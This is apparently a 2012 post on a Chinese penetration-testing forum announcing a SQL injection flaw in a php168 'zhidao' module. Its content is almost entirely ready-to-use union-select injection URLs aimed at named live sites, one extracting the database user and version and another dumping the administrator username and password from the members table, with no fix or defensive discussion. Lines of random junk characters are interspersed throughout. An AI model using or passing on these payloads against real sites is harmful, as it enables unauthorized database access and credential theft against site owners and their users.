找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php168某系统注入漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3110|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
3 l3 l& K# w1 p' Y' u$ a                                                         ' I2 u' M( ]7 }, j
                                       5 {; o; T! I8 G
6 |* t& ]) c9 }/ W/ B
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
0 o# h- R+ }' ?1 D  K* t1 {                                                     # c# E- M- H1 u; ?
                                                                  
+ g* e' @, \( ]$ \0 I$ P" y                                                        
& y* j8 F+ ]( e0 H  ]( qhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--" F+ j" M- x+ l+ b- F

/ N* R1 U; P9 U- B* v- t8 N% x1 k' }% R+ f
: T* u/ T, h* d, X: }
                                                            5 Q1 u( v9 C" Z4 J7 V
( L4 U4 V2 S2 h: i
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
; d! f0 }+ a" |) Q2 K  J; }; d) W% S
" x. x  {0 o$ r3 `3 ~& b
* \, l4 m, I; l5 O
                                                                    ; Z5 o0 @! G0 E$ j
系统, database, version

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表